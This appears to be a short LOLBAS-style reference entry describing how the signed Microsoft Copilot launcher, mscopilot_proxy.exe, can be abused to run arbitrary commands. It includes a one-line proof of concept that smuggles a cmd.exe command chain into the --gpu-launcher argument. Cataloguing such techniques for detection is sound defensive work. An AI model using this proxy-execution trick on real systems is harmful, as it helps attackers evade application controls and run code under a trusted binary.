Mscopilot_proxy.exe

Microsoft Copilot proxy launcher

Paths

  • C:\Program Files (x86)\Microsoft\Copilot\Application\mscopilot_proxy.exe

Commands

Execute

`mscopilot_proxy.exe` will spawn the provided command. Parent `mscopilot_proxy.exe` process needs to be killed to avoid command being executed an infinite number of times.

Use case: Executes a process under a trusted Microsoft signed binary

Privileges: User

mscopilot_proxy.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher="cmd.exe /c calc.exe && taskkill /f /im mscopilot.exe &&"

Resources